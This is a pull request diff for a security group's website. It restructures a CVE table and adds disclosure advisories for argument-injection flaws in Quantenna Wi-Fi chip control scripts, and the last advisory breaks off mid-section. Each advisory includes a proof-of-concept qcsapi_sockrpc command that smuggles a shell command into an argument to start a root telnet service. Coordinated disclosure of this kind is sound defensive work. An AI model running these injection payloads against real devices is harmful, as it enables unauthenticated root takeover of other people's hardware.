### PR TITLE
Stage up a slew of new CVEs, and also fix up the CVE tables a little

### DIFF
--- a/content/cve.md
+++ b/content/cve.md
@@ -95,9 +95,12 @@ For issues involving other parties, please see additional requirements, below. N
 ## Published CVEs
 
 When we publish CVEs, we will tend to use this [template], adjusted to taste.
+
 <style>
 .nowrap-cve-cell-table td:first-child { white-space: nowrap; }
 </style>
+
+### 2023 Disclosures
 
 <div class="nowrap-cve-cell-table">
 
@@ -110,27 +113,38 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 | [CVE-2023-2906]  | 0x00c8    | **Wireshark CP2179 divide by zero** |
 | [CVE-2023-4504]  | 0x00c9    | **CUPS/libppd PostScript Parsing Heap Overflow** |
 | [CVE-2023-5841]  | 0x00cd    | **OpenEXR Heap Overflow in Scanline Deep Data Parsing** |
+
+### 2024 Disclosures
+
+| CVE              | Meeting   | Issue                                      |
+| ---------------- | --------- | ------------------------------------------ |
 | [CVE-2024-2053]  | 0x00d1    | **Artica Proxy Unauthenticated LFI Protection Bypass** |
 | [CVE-2024-2054]  | 0x00d1    | **Artica Proxy Unauthenticated PHP Deserialization** |
 | [CVE-2024-2055]  | 0x00d1    | **Artica Proxy Unauthenticated File Manage** |
 | [CVE-2024-2056]  | 0x00d1    | **Artica Proxy Loopback Services Remotely Accessible Unauthenticated** |
 | [CVE-2024-4224]  | 0x00d3    | **TP-Link TL-SG1016DE XSS** |
+
+### 2025 Disclosures
+
+| CVE              | Meeting   | Issue                                      |
+| ---------------- | --------- | ------------------------------------------ |
 | [CVE-2025-2894]  | 0x00de    | **Unitree Go1 Backdoor Control Channel** |
-| [CVE-2025-3459]  | 0x00df    | **ON Semiconductor Quantenna transmit_file Arg Injection** |
-| [CVE-2025-3460]  | 0x00df    | **ON Semiconductor Quantenna set_tx_pow Arg Injection** |
-| [CVE-2025-3461]  | 0x00df    | **ON Semiconductor Quantenna Telent Missing Auth** |
-| [CVE-2025-32455] | 0x00df    | **ON Semiconductor Quantenna Telent Missing Auth** |
-| [CVE-2025-32456] | 0x00df    | **ON Semiconductor Quantenna router_command.sh put_file_to_qtn Arg Injection** |
-| [CVE-2025-32457] | 0x00df    | **ON Semiconductor Quantenna router_command.sh get_file_from_qtn Arg Injection** |
-| [CVE-2025-32458] | 0x00df    | **ON Semiconductor Quantenna router_command.sh get_syslog_from_qtn Arg Injection** |
-| [CVE-2025-32459] | 0x00df    | **ON Semiconductor Quantenna router_command.sh sync_time Arg Injection** |
-| [CVE-2025-35004] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFIP Arg Injection** |
-| [CVE-2025-35005] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFMAC Arg Injection** |
-| [CVE-2025-35006] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFPORTFWD Arg Injection** |
-| [CVE-2025-35007] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFRULE Arg Injection** |
-| [CVE-2025-35008] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MMNAME Arg Injection** |
-| [CVE-2025-35009] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNNETSP Arg Injection** |
-| [CVE-2025-35010] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNPINGTM Arg Injection** |
+| [CVE-2025-3459]  | 0x00df    | **onsemi Quantenna transmit_file ArgInj** |
+| [CVE-2025-3460]  | 0x00df    | **onsemi Quantenna set_tx_pow ArgInj** |
+| [CVE-2025-3461]  | 0x00df    | **onsemi Quantenna Telent Missing Auth** |
+| [CVE-2025-32455] | 0x00df    | **onsemi Quantenna router_command run_cmd ArgInj** |
+| [CVE-2025-32456] | 0x00df    | **onsemi Quantenna router_command put_file_to_qtn ArgInj** |
+| [CVE-2025-32457] | 0x00df    | **onsemi Quantenna router_command get_file_from_qtn ArgInj** |
+| [CVE-2025-32458] | 0x00df    | **onsemi Quantenna router_command get_syslog_from_qtn ArgInj** |
+| [CVE-2025-32459] | 0x00df    | **onsemi Quantenna router_command sync_time ArgInj** |
+| [CVE-2025-35004] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFIP ArgInj** |
+| [CVE-2025-35005] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFMAC ArgInj** |
+| [CVE-2025-35006] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFPORTFWD ArgInj** |
+| [CVE-2025-35007] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFRULE ArgInj** |
+| [CVE-2025-35008] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MMNAME ArgInj** |
+| [CVE-2025-35009] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNNETSP ArgInj** |
+| [CVE-2025-35010] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNPINGTM ArgInj** |
+
 </div>
 
 ## Reserved CVEs

--- a/content/cve.md
+++ b/content/cve.md
@@ -95,6 +95,11 @@ For issues involving other parties, please see additional requirements, below. N
 ## Published CVEs
 
 When we publish CVEs, we will tend to use this [template], adjusted to taste.
+<style>
+.nowrap-cve-cell-table td:first-child { white-space: nowrap; }
+</style>
+
+<div class="nowrap-cve-cell-table">
 
 | CVE              | Meeting   | Issue                                      |
 | ---------------- | --------- | ------------------------------------------ |
@@ -126,6 +131,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 | [CVE-2025-35008] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MMNAME Arg Injection** |
 | [CVE-2025-35009] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNNETSP Arg Injection** |
 | [CVE-2025-35010] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNPINGTM Arg Injection** |
+</div>
 
 ## Reserved CVEs
 

--- a/content/cve.md
+++ b/content/cve.md
@@ -111,6 +111,21 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 | [CVE-2024-2056]  | 0x00d1    | **Artica Proxy Loopback Services Remotely Accessible Unauthenticated** |
 | [CVE-2024-4224]  | 0x00d3    | **TP-Link TL-SG1016DE XSS** |
 | [CVE-2025-2894]  | 0x00de    | **Unitree Go1 Backdoor Control Channel** |
+| [CVE-2025-3459]  | 0x00df    | **ON Semiconductor Quantenna transmit_file Arg Injection** |
+| [CVE-2025-3460]  | 0x00df    | **ON Semiconductor Quantenna set_tx_pow Arg Injection** |
+| [CVE-2025-3461]  | 0x00df    | **ON Semiconductor Quantenna Telent Missing Auth** |
+| [CVE-2025-32455] | 0x00df    | **ON Semiconductor Quantenna Telent Missing Auth** |
+| [CVE-2025-32456] | 0x00df    | **ON Semiconductor Quantenna router_command.sh put_file_to_qtn Arg Injection** |
+| [CVE-2025-32457] | 0x00df    | **ON Semiconductor Quantenna router_command.sh get_file_from_qtn Arg Injection** |
+| [CVE-2025-32458] | 0x00df    | **ON Semiconductor Quantenna router_command.sh get_syslog_from_qtn Arg Injection** |
+| [CVE-2025-32459] | 0x00df    | **ON Semiconductor Quantenna router_command.sh sync_time Arg Injection** |
+| [CVE-2025-35004] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFIP Arg Injection** |
+| [CVE-2025-35005] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFMAC Arg Injection** |
+| [CVE-2025-35006] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFPORTFWD Arg Injection** |
+| [CVE-2025-35007] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MFRULE Arg Injection** |
+| [CVE-2025-35008] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MMNAME Arg Injection** |
+| [CVE-2025-35009] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNNETSP Arg Injection** |
+| [CVE-2025-35010] | 0x00df    | **Microhard Bullet-LTE/IPn4Gii AT+MNPINGTM Arg Injection** |
 
 ## Reserved CVEs
 
@@ -143,3 +158,18 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
 [CVE-2024-2056]: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt
 [CVE-2024-4224]: {{< baseurl >}}cves/cve-2024-4224/
 [CVE-2025-2894]: {{< baseurl >}}cves/cve-2025-2894/
+[CVE-2025-3459]: {{< baseurl >}}cves/cve-2025-3459/
+[CVE-2025-3460]: {{< baseurl >}}cves/cve-2025-3460/
+[CVE-2025-3461]: {{< baseurl >}}cves/cve-2025-3461/
+[CVE-2025-32455]: {{< baseurl >}}cves/cve-2025-32455/
+[CVE-2025-32456]: {{< baseurl >}}cves/cve-2025-32456/
+[CVE-2025-32457]: {{< baseurl >}}cves/cve-2025-32457/
+[CVE-2025-32458]: {{< baseurl >}}cves/cve-2025-32458/
+[CVE-2025-32459]: {{< baseurl >}}cves/cve-2025-32459/
+[CVE-2025-35004]: {{< baseurl >}}cves/cve-2025-35004/
+[CVE-2025-35005]: {{< baseurl >}}cves/cve-2025-35005/
+[CVE-2025-35006]: {{< baseurl >}}cves/cve-2025-35006/
+[CVE-2025-35007]: {{< baseurl >}}cves/cve-2025-35007/
+[CVE-2025-35008]: {{< baseurl >}}cves/cve-2025-35008/
+[CVE-2025-35009]: {{< baseurl >}}cves/cve-2025-35009/
+[CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/

--- a/content/cve.md
+++ b/content/cve.md
@@ -114,11 +114,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 
 ## Reserved CVEs
 
-We've reserved the following CVEs for upcoming publication.
-
-| CVE             | Meeting   |
-| --------------- | --------- |
-| None yet!       | 0x00xx    |
+We've reserved some number of CVEs, but it's all quite secretive and sneaky to avoid the dreaded [RBP Goblins](https://cve.mitre.org/cve/cna/RBP_Policy_v1-0.pdf). We'll publish when we publish.
 
 ### Contact
 

--- a/content/cves/CVE-2025-32455.md
+++ b/content/cves/CVE-2025-32455.md
@@ -1,0 +1,62 @@
+---
+title: CVE-2025-32455
+aliases:
+  - /cves/CVE-2025-32455.html
+---
+
+# CVE-2025-32455: ON Semiconductor Quantenna router_command.sh run_cmd Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-32455] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The run_cmd function of the router_command.sh script is vulnerable to command injection. Observe the following code snippet:
+
+```
+if [ "$1" == "run_cmd" ] ; then
+        chmod a+x $2
+        $2
+fi
+```
+
+There is no sanitization on the second argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the router_command.sh script as follows:
+
+```
+qcsapi_sockrpc run_script router_command.sh run_cmd "\`/usr/sbin/inetd\`"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-32455]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-32455]: https://www.cve.org/CVERecord?id=CVE-2025-32455
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-32456.md
+++ b/content/cves/CVE-2025-32456.md
@@ -1,0 +1,60 @@
+---
+title: CVE-2025-32456
+aliases:
+  - /cves/CVE-2025-32456.html
+---
+
+# CVE-2025-32456: ON Semiconductor Quantenna router_command.sh put_file_to_qtn Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-32456] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The put_file_to_qtn function of the router_command.sh script is vulnerable to command injection. Observe the following code snippet:
+
+```
+if [ "$1" == "put_file_to_qtn" ] ; then
+        tftp -g $2 -r $3 -l $4
+fi
+```
+There is no sanitization on the second, third, or fourth argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the router_command.sh script as follows:
+
+```
+qcsapi_sockrpc run_script router_command.sh put_file_to_qtn "1;/usr/sbin/inetd$IFS#"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-32456]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-32456]: https://www.cve.org/CVERecord?id=CVE-2025-32456
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-32457.md
+++ b/content/cves/CVE-2025-32457.md
@@ -1,0 +1,60 @@
+---
+title: CVE-2025-32457
+aliases:
+  - /cves/CVE-2025-32457.html
+---
+
+# CVE-2025-32457: ON Semiconductor Quantenna router_command.sh get_file_from_qtn Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-32457] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The get_file_from_qtn function of the router_command.sh script is vulnerable to command injection. Observe the following code snippet:
+
+```if [ "$1" == "get_file_from_qtn" ] ; then
+        tftp -p $2 -r $4 -l $3
+fi
+```
+
+There is no sanitization on the second, third, or fourth argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the router_command.sh script as follows:
+
+```
+qcsapi_sockrpc run_script router_command.sh get_file_from_qtn "1;/usr/sbin/inetd$IFS#"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-32457]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-32457]: https://www.cve.org/CVERecord?id=CVE-2025-32457
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-32458.md
+++ b/content/cves/CVE-2025-32458.md
@@ -1,0 +1,62 @@
+---
+title: CVE-2025-32458
+aliases:
+  - /cves/CVE-2025-32458.html
+---
+
+# CVE-2025-32458: ON Semiconductor Quantenna router_command.sh get_syslog_from_qtn Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-32458] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The get_syslog_from_qtn function of the router_command.sh script is vulnerable to command injection. Observe the following code snippet:
+
+```if [ "$1" == "get_syslog_from_qtn" ] ; then
+        logmsg -t time `uptime`
+        logmsg -t time `date`
+        tftp -p $2 -r syslog.qtn -l /tmp/syslog.log
+fi
+```
+
+There is no sanitization on the second argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the router_command.sh script as follows:
+
+```
+qcsapi_sockrpc run_script router_command.sh get_syslog_from_qtn "1;/usr/sbin/inetd$IFS#"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-32458]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-32458]: https://www.cve.org/CVERecord?id=CVE-2025-32458
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-32459.md
+++ b/content/cves/CVE-2025-32459.md
@@ -1,0 +1,61 @@
+---
+title: CVE-2025-32459
+aliases:
+  - /cves/CVE-2025-32459.html
+---
+
+# CVE-2025-32459: ON Semiconductor Quantenna router_command.sh sync_time Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-32459] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The sync_time function of the router_command.sh script is vulnerable to command injection. Observe the following code snippet:
+
+```
+if [ "$1" == "sync_time" ]; then
+        date -s ${2}
+fi
+```
+
+There is no sanitization on the second argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the router_command.sh script as follows:
+
+```
+qcsapi_sockrpc run_script router_command.sh sync_time \`/usr/sbin/inetd\`
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-32459]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-32459]: https://www.cve.org/CVERecord?id=CVE-2025-32459
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-3459.md
+++ b/content/cves/CVE-2025-3459.md
@@ -1,0 +1,65 @@
+---
+title: CVE-2025-3459
+aliases:
+  - /cves/CVE-2025-3459.html
+---
+
+# CVE-2025-3459: ON Semiconductor Quantenna transmit_file Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-3459] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The transmit_file script is vulnerable to command injection. Observe the following code snippet:
+
+```
+if [ $# -ne 2 ]
+then
+    echo "Usage: transmit_file <image name> <host IP address>"
+    exit 1
+fi
+
+tftp -g $2 -r $1 -l /tmp/$1
+```
+
+There is no sanitization on the first or second argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the transmit_file script as follows:
+
+```
+qcsapi_sockrpc run_script transmit_file "\`/usr/sbin/inetd\`" "\#"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
+Assuming the implementor of the Quantenna Wi-Fi chip has failed to disable the qcsapi rpc service in their end product, an attacker can use this vulnerability to run any command as root, noting especially the ability to enable the telnet service (and thus, chaining this issue with the issue described in [CVE-2025-3461]). This, in turn, can allow the attacker to essentially take complete control of the Quantenna Wi-Fi chip remotely, without authentication.
+
+Note that it may be tricky to identify what end products incorporate this chipset. If you're aware of this chipset in use in your Wi-Fi access point, please feel free to share, as end-users are unlikely to be capable of working around this issue on their own.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to support@onsemi.com
+* 2025-04-08 (Tue): Discovered and contact established with psirt@onsemi.com.
+* 2025-04-11 (Fri): Acknowledged by the vendor
+* 2025 (April and May): Various communications about this and other discovered issues between AHA! and the vendor
+* 2025-05-19 (Mon): Draft best practices report shared with AHA!
+* 2025-05-30 (Fri): Best practices guidance [published by the vendor](https://community.onsemi.com/s/article/QCS-Quantenna-Wi-Fi-product-support-and-security-best-practices)
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-3459]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-3459]: https://www.cve.org/CVERecord?id=CVE-2025-3459
+[CVE-2025-3461]: https://www.cve.org/CVERecord?id=CVE-2025-3461

--- a/content/cves/CVE-2025-3460.md
+++ b/content/cves/CVE-2025-3460.md
@@ -1,0 +1,62 @@
+---
+title: CVE-2025-3460
+aliases:
+  - /cves/CVE-2025-3460.html
+---
+
+# CVE-2025-3460: ON Semiconductor Quantenna set_tx_pow Argument Injection
+
+[AHA!] has discovered an issue with Quantenna Wi-Fi chips from ON Semiconductor, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-3460] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Quantenna Wi-Fi chips ship with a local control script that is vulnerable to command injection. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.7](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+The set_tx_pow script is vulnerable to command injection. Observe the following code snippet:
+
+```
+max_tx_power=`get_bootval max_tx_power`
+min_tx_power=`get_bootval min_tx_power`
+
+power=$1
+```
+
+There is no sanitization on the first argument, allowing an attacker to put any command they want in there and it will run. An example of remote exploitation of this vulnerability would be to use the qcsapi rpc service to run the run_script command on the set_tx_pow script as follows:
+
+```
+qcsapi_sockrpc run_script set_tx_pow "\`/usr/sbin/inetd\`"
+```
+
+This would cause a telnet service to spawn on the affected chip, but the command could be anything and would run as root.
+
+# Attacker Value
+
